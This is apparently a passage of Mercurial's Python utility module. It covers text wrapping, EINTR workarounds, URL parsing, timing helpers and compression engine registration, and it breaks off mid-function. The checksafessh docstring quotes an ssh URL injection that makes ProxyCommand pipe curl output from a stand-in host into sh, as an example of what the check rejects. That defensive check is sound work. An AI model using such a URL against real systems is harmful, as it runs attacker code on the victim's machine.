2433 2433 pycompat.sysstr(encoding.encodingmode))
2434 2434 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2435 2435 pycompat.sysstr(encoding.encodingmode))
2436 2436 wrapper = MBTextWrapper(width=width,
2437 2437 initial_indent=initindent,
2438 2438 subsequent_indent=hangindent)
2439 2439 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2440 2440
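A usage sketch for the wrapper entry point above; the input is a byte string in the local encoding, and the two indents control the first and continuation lines respectively:

text = wrap('a long option description that must fit a narrow terminal',
            width=30, initindent=' ', hangindent='   ')
# first line indented by one space, continuation lines by three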
2441 2441 if (pyplatform.python_implementation() == 'CPython' and
2442 2442 sys.version_info < (3, 0)):
2443 2443 # There is an issue in CPython that some IO methods do not handle EINTR
2444 2444 # correctly. The following table shows what CPython version (and functions)
2445 2445 # are affected (buggy: has the EINTR bug, okay: otherwise):
2446 2446 #
2447 2447 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2448 2448 # --------------------------------------------------
2449 2449 # fp.__iter__ | buggy | buggy | okay
2450 2450 # fp.read* | buggy | okay [1] | okay
2451 2451 #
2452 2452 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2453 2453 #
2454 2454 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2455 2455 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2456 2456 #
2457 2457 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2458 2458 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2459 2459 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2460 2460 # fp.__iter__ but not other fp.read* methods.
2461 2461 #
2462 2462 # On modern systems like Linux, the "read" syscall cannot be interrupted
2463 2463 # when reading "fast" files like on-disk files. So the EINTR issue only
2464 2464 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2465 2465 # files approximately as "fast" files and use the fast (unsafe) code path,
2466 2466 # to minimize the performance impact.
2467 2467 if sys.version_info >= (2, 7, 4):
2468 2468 # fp.readline deals with EINTR correctly, use it as a workaround.
2469 2469 def _safeiterfile(fp):
2470 2470 return iter(fp.readline, '')
2471 2471 else:
2472 2472 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2473 2473 # note: this may block longer than necessary because of bufsize.
2474 2474 def _safeiterfile(fp, bufsize=4096):
2475 2475 fd = fp.fileno()
2476 2476 line = ''
2477 2477 while True:
2478 2478 try:
2479 2479 buf = os.read(fd, bufsize)
2480 2480 except OSError as ex:
2481 2481 # os.read only raises EINTR before any data is read
2482 2482 if ex.errno == errno.EINTR:
2483 2483 continue
2484 2484 else:
2485 2485 raise
2486 2486 line += buf
2487 2487 if '\n' in buf:
2488 2488 splitted = line.splitlines(True)
2489 2489 line = ''
2490 2490 for l in splitted:
2491 2491 if l[-1] == '\n':
2492 2492 yield l
2493 2493 else:
2494 2494 line = l
2495 2495 if not buf:
2496 2496 break
2497 2497 if line:
2498 2498 yield line
2499 2499
2500 2500 def iterfile(fp):
2501 2501 fastpath = True
2502 2502 if type(fp) is file:
2503 2503 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2504 2504 if fastpath:
2505 2505 return fp
2506 2506 else:
2507 2507 return _safeiterfile(fp)
2508 2508 else:
2509 2509 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2510 2510 def iterfile(fp):
2511 2511 return fp
2512 2512
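The heart of the >= 2.7.4 workaround above is the two-argument iter() idiom: it re-enters readline() for every line, and readline() retries on EINTR, unlike the readahead buffer behind fp.__iter__ (a minimal illustration; the file name is made up):

fp = open('some.log')
for line in iter(fp.readline, ''):  # readline handles EINTR itself;
    pass                            # the '' sentinel stops at EOF
fp.close()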
2513 2513 def iterlines(iterator):
2514 2514 for chunk in iterator:
2515 2515 for line in chunk.splitlines():
2516 2516 yield line
2517 2517
2518 2518 def expandpath(path):
2519 2519 return os.path.expanduser(os.path.expandvars(path))
2520 2520
2521 2521 def hgcmd():
2522 2522 """Return the command used to execute current hg
2523 2523
2524 2524 This is different from hgexecutable() because on Windows we want
2525 2525 to avoid things opening new shell windows like batch files, so we
2526 2526 get either the python call or current executable.
2527 2527 """
2528 2528 if mainfrozen():
2529 2529 if getattr(sys, 'frozen', None) == 'macosx_app':
2530 2530 # Env variable set by py2app
2531 2531 return [encoding.environ['EXECUTABLEPATH']]
2532 2532 else:
2533 2533 return [pycompat.sysexecutable]
2534 2534 return gethgcmd()
2535 2535
2536 2536 def rundetached(args, condfn):
2537 2537 """Execute the argument list in a detached process.
2538 2538
2539 2539 condfn is a callable which is called repeatedly and should return
2540 2540 True once the child process is known to have started successfully.
2541 2541 At this point, the child process PID is returned. If the child
2542 2542 process fails to start or finishes before condfn() evaluates to
2543 2543 True, return -1.
2544 2544 """
2545 2545 # Windows case is easier because the child process is either
2546 2546 # successfully starting and validating the condition or exiting
2547 2547 # on failure. We just poll on its PID. On Unix, if the child
2548 2548 # process fails to start, it will be left in a zombie state until
2549 2549 # the parent waits on it, which we cannot do since we expect a long
2550 2550 # running process on success. Instead we listen for SIGCHLD telling
2551 2551 # us our child process terminated.
2552 2552 terminated = set()
2553 2553 def handler(signum, frame):
2554 2554 terminated.add(os.wait())
2555 2555 prevhandler = None
2556 2556 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2557 2557 if SIGCHLD is not None:
2558 2558 prevhandler = signal.signal(SIGCHLD, handler)
2559 2559 try:
2560 2560 pid = spawndetached(args)
2561 2561 while not condfn():
2562 2562 if ((pid in terminated or not testpid(pid))
2563 2563 and not condfn()):
2564 2564 return -1
2565 2565 time.sleep(0.1)
2566 2566 return pid
2567 2567 finally:
2568 2568 if prevhandler is not None:
2569 2569 signal.signal(signal.SIGCHLD, prevhandler)
2570 2570
2571 2571 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2572 2572 """Return the result of interpolating items in the mapping into string s.
2573 2573
2574 2574 prefix is a single character string, or a two character string with
2575 2575 a backslash as the first character if the prefix needs to be escaped in
2576 2576 a regular expression.
2577 2577
2578 2578 fn is an optional function that will be applied to the replacement text
2579 2579 just before replacement.
2580 2580
2581 2581 escape_prefix is an optional flag that allows using doubled prefix for
2582 2582 its escaping.
2583 2583 """
2584 2584 fn = fn or (lambda s: s)
2585 2585 patterns = '|'.join(mapping.keys())
2586 2586 if escape_prefix:
2587 2587 patterns += '|' + prefix
2588 2588 if len(prefix) > 1:
2589 2589 prefix_char = prefix[1:]
2590 2590 else:
2591 2591 prefix_char = prefix
2592 2592 mapping[prefix_char] = prefix_char
2593 2593 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2594 2594 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2595 2595
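A short sketch of the interpolation helper above, including the doubled-prefix escape:

interpolate('%', {'a': 'apple', 'b': 'banana'}, 'eat a %a or a %b')
# -> 'eat a apple or a banana'

interpolate('%', {'a': 'apple'}, '100%% sure: %a', escape_prefix=True)
# -> '100% sure: apple'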
2596 2596 def getport(port):
2597 2597 """Return the port for a given network service.
2598 2598
2599 2599 If port is an integer, it's returned as is. If it's a string, it's
2600 2600 looked up using socket.getservbyname(). If there's no matching
2601 2601 service, error.Abort is raised.
2602 2602 """
2603 2603 try:
2604 2604 return int(port)
2605 2605 except ValueError:
2606 2606 pass
2607 2607
2608 2608 try:
2609 2609 return socket.getservbyname(port)
2610 2610 except socket.error:
2611 2611 raise Abort(_("no port number associated with service '%s'") % port)
2612 2612
2613 2613 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2614 2614 '0': False, 'no': False, 'false': False, 'off': False,
2615 2615 'never': False}
2616 2616
2617 2617 def parsebool(s):
2618 2618 """Parse s into a boolean.
2619 2619
2620 2620 If s is not a valid boolean, returns None.
2621 2621 """
2622 2622 return _booleans.get(s.lower(), None)
2623 2623
2624 2624 _hextochr = dict((a + b, chr(int(a + b, 16)))
2625 2625 for a in string.hexdigits for b in string.hexdigits)
2626 2626
2627 2627 class url(object):
2628 2628 r"""Reliable URL parser.
2629 2629
2630 2630 This parses URLs and provides attributes for the following
2631 2631 components:
2632 2632
2633 2633 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2634 2634
2635 2635 Missing components are set to None. The only exception is
2636 2636 fragment, which is set to '' if present but empty.
2637 2637
2638 2638 If parsefragment is False, fragment is included in query. If
2639 2639 parsequery is False, query is included in path. If both are
2640 2640 False, both fragment and query are included in path.
2641 2641
2642 2642 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2643 2643
2644 2644 Note that for backward compatibility reasons, bundle URLs do not
2645 2645 take host names. That means 'bundle://../' has a path of '../'.
2646 2646
2647 2647 Examples:
2648 2648
2649 2649 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2650 2650 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2651 2651 >>> url('ssh://[::1]:2200//home/joe/repo')
2652 2652 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2653 2653 >>> url('file:///home/joe/repo')
2654 2654 <url scheme: 'file', path: '/home/joe/repo'>
2655 2655 >>> url('file:///c:/temp/foo/')
2656 2656 <url scheme: 'file', path: 'c:/temp/foo/'>
2657 2657 >>> url('bundle:foo')
2658 2658 <url scheme: 'bundle', path: 'foo'>
2659 2659 >>> url('bundle://../foo')
2660 2660 <url scheme: 'bundle', path: '../foo'>
2661 2661 >>> url(r'c:\foo\bar')
2662 2662 <url path: 'c:\\foo\\bar'>
2663 2663 >>> url(r'\\blah\blah\blah')
2664 2664 <url path: '\\\\blah\\blah\\blah'>
2665 2665 >>> url(r'\\blah\blah\blah#baz')
2666 2666 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2667 2667 >>> url(r'file:///C:\users\me')
2668 2668 <url scheme: 'file', path: 'C:\\users\\me'>
2669 2669
2670 2670 Authentication credentials:
2671 2671
2672 2672 >>> url('ssh://joe:xyz@x/repo')
2673 2673 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2674 2674 >>> url('ssh://joe@x/repo')
2675 2675 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2676 2676
2677 2677 Query strings and fragments:
2678 2678
2679 2679 >>> url('http://host/a?b#c')
2680 2680 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2681 2681 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2682 2682 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2683 2683
2684 2684 Empty path:
2685 2685
2686 2686 >>> url('')
2687 2687 <url path: ''>
2688 2688 >>> url('#a')
2689 2689 <url path: '', fragment: 'a'>
2690 2690 >>> url('http://host/')
2691 2691 <url scheme: 'http', host: 'host', path: ''>
2692 2692 >>> url('http://host/#a')
2693 2693 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2694 2694
2695 2695 Only scheme:
2696 2696
2697 2697 >>> url('http:')
2698 2698 <url scheme: 'http'>
2699 2699 """
2700 2700
2701 2701 _safechars = "!~*'()+"
2702 2702 _safepchars = "/!~*'()+:\\"
2703 2703 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2704 2704
2705 2705 def __init__(self, path, parsequery=True, parsefragment=True):
2706 2706 # We slowly chomp away at path until we have only the path left
2707 2707 self.scheme = self.user = self.passwd = self.host = None
2708 2708 self.port = self.path = self.query = self.fragment = None
2709 2709 self._localpath = True
2710 2710 self._hostport = ''
2711 2711 self._origpath = path
2712 2712
2713 2713 if parsefragment and '#' in path:
2714 2714 path, self.fragment = path.split('#', 1)
2715 2715
2716 2716 # special case for Windows drive letters and UNC paths
2717 2717 if hasdriveletter(path) or path.startswith('\\\\'):
2718 2718 self.path = path
2719 2719 return
2720 2720
2721 2721 # For compatibility reasons, we can't handle bundle paths as
2722 2722 # normal URLS
2723 2723 if path.startswith('bundle:'):
2724 2724 self.scheme = 'bundle'
2725 2725 path = path[7:]
2726 2726 if path.startswith('//'):
2727 2727 path = path[2:]
2728 2728 self.path = path
2729 2729 return
2730 2730
2731 2731 if self._matchscheme(path):
2732 2732 parts = path.split(':', 1)
2733 2733 if parts[0]:
2734 2734 self.scheme, path = parts
2735 2735 self._localpath = False
2736 2736
2737 2737 if not path:
2738 2738 path = None
2739 2739 if self._localpath:
2740 2740 self.path = ''
2741 2741 return
2742 2742 else:
2743 2743 if self._localpath:
2744 2744 self.path = path
2745 2745 return
2746 2746
2747 2747 if parsequery and '?' in path:
2748 2748 path, self.query = path.split('?', 1)
2749 2749 if not path:
2750 2750 path = None
2751 2751 if not self.query:
2752 2752 self.query = None
2753 2753
2754 2754 # // is required to specify a host/authority
2755 2755 if path and path.startswith('//'):
2756 2756 parts = path[2:].split('/', 1)
2757 2757 if len(parts) > 1:
2758 2758 self.host, path = parts
2759 2759 else:
2760 2760 self.host = parts[0]
2761 2761 path = None
2762 2762 if not self.host:
2763 2763 self.host = None
2764 2764 # path of file:///d is /d
2765 2765 # path of file:///d:/ is d:/, not /d:/
2766 2766 if path and not hasdriveletter(path):
2767 2767 path = '/' + path
2768 2768
2769 2769 if self.host and '@' in self.host:
2770 2770 self.user, self.host = self.host.rsplit('@', 1)
2771 2771 if ':' in self.user:
2772 2772 self.user, self.passwd = self.user.split(':', 1)
2773 2773 if not self.host:
2774 2774 self.host = None
2775 2775
2776 2776 # Don't split on colons in IPv6 addresses without ports
2777 2777 if (self.host and ':' in self.host and
2778 2778 not (self.host.startswith('[') and self.host.endswith(']'))):
2779 2779 self._hostport = self.host
2780 2780 self.host, self.port = self.host.rsplit(':', 1)
2781 2781 if not self.host:
2782 2782 self.host = None
2783 2783
2784 2784 if (self.host and self.scheme == 'file' and
2785 2785 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2786 2786 raise Abort(_('file:// URLs can only refer to localhost'))
2787 2787
2788 2788 self.path = path
2789 2789
2790 2790 # leave the query string escaped
2791 2791 for a in ('user', 'passwd', 'host', 'port',
2792 2792 'path', 'fragment'):
2793 2793 v = getattr(self, a)
2794 2794 if v is not None:
2795 2795 setattr(self, a, urlreq.unquote(v))
2796 2796
2797 2797 def __repr__(self):
2798 2798 attrs = []
2799 2799 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2800 2800 'query', 'fragment'):
2801 2801 v = getattr(self, a)
2802 2802 if v is not None:
2803 2803 attrs.append('%s: %r' % (a, v))
2804 2804 return '<url %s>' % ', '.join(attrs)
2805 2805
2806 2806 def __bytes__(self):
2807 2807 r"""Join the URL's components back into a URL string.
2808 2808
2809 2809 Examples:
2810 2810
2811 2811 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2812 2812 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2813 2813 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2814 2814 'http://user:pw@host:80/?foo=bar&baz=42'
2815 2815 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2816 2816 'http://user:pw@host:80/?foo=bar%3dbaz'
2817 2817 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2818 2818 'ssh://user:pw@[::1]:2200//home/joe#'
2819 2819 >>> str(url('http://localhost:80//'))
2820 2820 'http://localhost:80//'
2821 2821 >>> str(url('http://localhost:80/'))
2822 2822 'http://localhost:80/'
2823 2823 >>> str(url('http://localhost:80'))
2824 2824 'http://localhost:80/'
2825 2825 >>> str(url('bundle:foo'))
2826 2826 'bundle:foo'
2827 2827 >>> str(url('bundle://../foo'))
2828 2828 'bundle:../foo'
2829 2829 >>> str(url('path'))
2830 2830 'path'
2831 2831 >>> str(url('file:///tmp/foo/bar'))
2832 2832 'file:///tmp/foo/bar'
2833 2833 >>> str(url('file:///c:/tmp/foo/bar'))
2834 2834 'file:///c:/tmp/foo/bar'
2835 2835 >>> print url(r'bundle:foo\bar')
2836 2836 bundle:foo\bar
2837 2837 >>> print url(r'file:///D:\data\hg')
2838 2838 file:///D:\data\hg
2839 2839 """
2840 2840 if self._localpath:
2841 2841 s = self.path
2842 2842 if self.scheme == 'bundle':
2843 2843 s = 'bundle:' + s
2844 2844 if self.fragment:
2845 2845 s += '#' + self.fragment
2846 2846 return s
2847 2847
2848 2848 s = self.scheme + ':'
2849 2849 if self.user or self.passwd or self.host:
2850 2850 s += '//'
2851 2851 elif self.scheme and (not self.path or self.path.startswith('/')
2852 2852 or hasdriveletter(self.path)):
2853 2853 s += '//'
2854 2854 if hasdriveletter(self.path):
2855 2855 s += '/'
2856 2856 if self.user:
2857 2857 s += urlreq.quote(self.user, safe=self._safechars)
2858 2858 if self.passwd:
2859 2859 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2860 2860 if self.user or self.passwd:
2861 2861 s += '@'
2862 2862 if self.host:
2863 2863 if not (self.host.startswith('[') and self.host.endswith(']')):
2864 2864 s += urlreq.quote(self.host)
2865 2865 else:
2866 2866 s += self.host
2867 2867 if self.port:
2868 2868 s += ':' + urlreq.quote(self.port)
2869 2869 if self.host:
2870 2870 s += '/'
2871 2871 if self.path:
2872 2872 # TODO: similar to the query string, we should not unescape the
2873 2873 # path when we store it, the path might contain '%2f' = '/',
2874 2874 # which we should *not* escape.
2875 2875 s += urlreq.quote(self.path, safe=self._safepchars)
2876 2876 if self.query:
2877 2877 # we store the query in escaped form.
2878 2878 s += '?' + self.query
2879 2879 if self.fragment is not None:
2880 2880 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2881 2881 return s
2882 2882
2883 2883 __str__ = encoding.strmethod(__bytes__)
2884 2884
2885 2885 def authinfo(self):
2886 2886 user, passwd = self.user, self.passwd
2887 2887 try:
2888 2888 self.user, self.passwd = None, None
2889 2889 s = bytes(self)
2890 2890 finally:
2891 2891 self.user, self.passwd = user, passwd
2892 2892 if not self.user:
2893 2893 return (s, None)
2894 2894 # authinfo[1] is passed to urllib2 password manager, and its
2895 2895 # URIs must not contain credentials. The host is passed in the
2896 2896 # URIs list because Python < 2.4.3 uses only that to search for
2897 2897 # a password.
2898 2898 return (s, (None, (s, self.host),
2899 2899 self.user, self.passwd or ''))
2900 2900
2901 2901 def isabs(self):
2902 2902 if self.scheme and self.scheme != 'file':
2903 2903 return True # remote URL
2904 2904 if hasdriveletter(self.path):
2905 2905 return True # absolute for our purposes - can't be joined()
2906 2906 if self.path.startswith(br'\\'):
2907 2907 return True # Windows UNC path
2908 2908 if self.path.startswith('/'):
2909 2909 return True # POSIX-style
2910 2910 return False
2911 2911
2912 2912 def localpath(self):
2913 2913 if self.scheme == 'file' or self.scheme == 'bundle':
2914 2914 path = self.path or '/'
2915 2915 # For Windows, we need to promote hosts containing drive
2916 2916 # letters to paths with drive letters.
2917 2917 if hasdriveletter(self._hostport):
2918 2918 path = self._hostport + '/' + self.path
2919 2919 elif (self.host is not None and self.path
2920 2920 and not hasdriveletter(path)):
2921 2921 path = '/' + path
2922 2922 return path
2923 2923 return self._origpath
2924 2924
2925 2925 def islocal(self):
2926 2926 '''whether localpath will return something that posixfile can open'''
2927 2927 return (not self.scheme or self.scheme == 'file'
2928 2928 or self.scheme == 'bundle')
2929 2929
2930 2930 def hasscheme(path):
2931 2931 return bool(url(path).scheme)
2932 2932
2933 2933 def hasdriveletter(path):
2934 2934 return path and path[1:2] == ':' and path[0:1].isalpha()
2935 2935
2936 2936 def urllocalpath(path):
2937 2937 return url(path, parsequery=False, parsefragment=False).localpath()
2938 2938
2939 2939 def checksafessh(path):
2940 2940 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2941 2941
2942 2942 This is a sanity check for ssh urls. ssh will parse the first item as
2943 2943 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2944 2944 Let's prevent these potentially exploited urls entirely and warn the
2945 2945 user.
2946 2946
2947 2947 Raises an error.Abort when the url is unsafe.
2948 2948 """
2949 2949 path = urlreq.unquote(path)
2950 2950 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2951 2951 raise error.Abort(_('potentially unsafe url: %r') %
2952 2952 (path,))
2953 2953
2954 2954 def hidepassword(u):
2955 2955 '''hide user credential in a url string'''
2956 2956 u = url(u)
2957 2957 if u.passwd:
2958 2958 u.passwd = '***'
2959 2959 return bytes(u)
2960 2960
2961 2961 def removeauth(u):
2962 2962 '''remove all authentication information from a url string'''
2963 2963 u = url(u)
2964 2964 u.user = u.passwd = None
2965 2965 return str(u)
2966 2966
2967 2967 timecount = unitcountfn(
2968 2968 (1, 1e3, _('%.0f s')),
2969 2969 (100, 1, _('%.1f s')),
2970 2970 (10, 1, _('%.2f s')),
2971 2971 (1, 1, _('%.3f s')),
2972 2972 (100, 0.001, _('%.1f ms')),
2973 2973 (10, 0.001, _('%.2f ms')),
2974 2974 (1, 0.001, _('%.3f ms')),
2975 2975 (100, 0.000001, _('%.1f us')),
2976 2976 (10, 0.000001, _('%.2f us')),
2977 2977 (1, 0.000001, _('%.3f us')),
2978 2978 (100, 0.000000001, _('%.1f ns')),
2979 2979 (10, 0.000000001, _('%.2f ns')),
2980 2980 (1, 0.000000001, _('%.3f ns')),
2981 2981 )
2982 2982
2983 2983 _timenesting = [0]
2984 2984
2985 2985 def timed(func):
2986 2986 '''Report the execution time of a function call to stderr.
2987 2987
2988 2988 During development, use as a decorator when you need to measure
2989 2989 the cost of a function, e.g. as follows:
2990 2990
2991 2991 @util.timed
2992 2992 def foo(a, b, c):
2993 2993 pass
2994 2994 '''
2995 2995
2996 2996 def wrapper(*args, **kwargs):
2997 2997 start = timer()
2998 2998 indent = 2
2999 2999 _timenesting[0] += indent
3000 3000 try:
3001 3001 return func(*args, **kwargs)
3002 3002 finally:
3003 3003 elapsed = timer() - start
3004 3004 _timenesting[0] -= indent
3005 3005 stderr.write('%s%s: %s\n' %
3006 3006 (' ' * _timenesting[0], func.__name__,
3007 3007 timecount(elapsed)))
3008 3008 return wrapper
3009 3009
3010 3010 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3011 3011 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3012 3012
3013 3013 def sizetoint(s):
3014 3014 '''Convert a space specifier to a byte count.
3015 3015
3016 3016 >>> sizetoint('30')
3017 3017 30
3018 3018 >>> sizetoint('2.2kb')
3019 3019 2252
3020 3020 >>> sizetoint('6M')
3021 3021 6291456
3022 3022 '''
3023 3023 t = s.strip().lower()
3024 3024 try:
3025 3025 for k, u in _sizeunits:
3026 3026 if t.endswith(k):
3027 3027 return int(float(t[:-len(k)]) * u)
3028 3028 return int(t)
3029 3029 except ValueError:
3030 3030 raise error.ParseError(_("couldn't parse size: %s") % s)
3031 3031
3032 3032 class hooks(object):
3033 3033 '''A collection of hook functions that can be used to extend a
3034 3034 function's behavior. Hooks are called in lexicographic order,
3035 3035 based on the names of their sources.'''
3036 3036
3037 3037 def __init__(self):
3038 3038 self._hooks = []
3039 3039
3040 3040 def add(self, source, hook):
3041 3041 self._hooks.append((source, hook))
3042 3042
3043 3043 def __call__(self, *args):
3044 3044 self._hooks.sort(key=lambda x: x[0])
3045 3045 results = []
3046 3046 for source, hook in self._hooks:
3047 3047 results.append(hook(*args))
3048 3048 return results
3049 3049
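A sketch of the container above in action; since hooks run in lexicographic order of their source names, the source string doubles as a priority knob:

h = hooks()
h.add('zz-audit', lambda repo: 'audited')
h.add('aa-validate', lambda repo: 'validated')
h(None)
# -> ['validated', 'audited']  (aa-validate runs before zz-audit)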
3050 3050 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3051 3051 '''Yields lines for a nicely formatted stacktrace.
3052 3052 Skips the 'skip' last entries, then returns the last 'depth' entries.
3053 3053 Each file+linenumber is formatted according to fileline.
3054 3054 Each line is formatted according to line.
3055 3055 If line is None, it yields:
3056 3056 length of longest filepath+line number,
3057 3057 filepath+linenumber,
3058 3058 function
3059 3059
3060 3060 Not to be used in production code, but very convenient while developing.
3061 3061 '''
3062 3062 entries = [(fileline % (fn, ln), func)
3063 3063 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3064 3064 ][-depth:]
3065 3065 if entries:
3066 3066 fnmax = max(len(entry[0]) for entry in entries)
3067 3067 for fnln, func in entries:
3068 3068 if line is None:
3069 3069 yield (fnmax, fnln, func)
3070 3070 else:
3071 3071 yield line % (fnmax, fnln, func)
3072 3072
3073 3073 def debugstacktrace(msg='stacktrace', skip=0,
3074 3074 f=stderr, otherf=stdout, depth=0):
3075 3075 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3076 3076 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3077 3077 By default it will flush stdout first.
3078 3078 It can be used everywhere and intentionally does not require an ui object.
3079 3079 Not to be used in production code, but very convenient while developing.
3080 3080 '''
3081 3081 if otherf:
3082 3082 otherf.flush()
3083 3083 f.write('%s at:\n' % msg.rstrip())
3084 3084 for line in getstackframes(skip + 1, depth=depth):
3085 3085 f.write(line)
3086 3086 f.flush()
3087 3087
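# Development-time example (a sketch; 'somefunc' is hypothetical):
#
#   def somefunc():
#       util.debugstacktrace('entering somefunc', depth=5)
#
# writes 'entering somefunc at:' plus the five nearest callers to stderr.
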
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

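# Illustrative behavior (a sketch): list(finddirs('a/b/c')) yields
# 'a/b' then 'a', so dirs({'a/b/c': 1, 'a/d': 1}) contains 'a' and 'a/b';
# delpath() only forgets a directory once no tracked file remains under it.
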
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

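# For example, a hypothetical engine named 'foo' that servers should prefer
# but clients should never advertise would declare
# compewireprotosupport(u'foo', 10, 0); non-positive priorities are not
# advertised (see wireprotosupport() below).
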
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # The external-facing name may be None to keep the engine out of
            # bundle specs; only register the name when one was declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
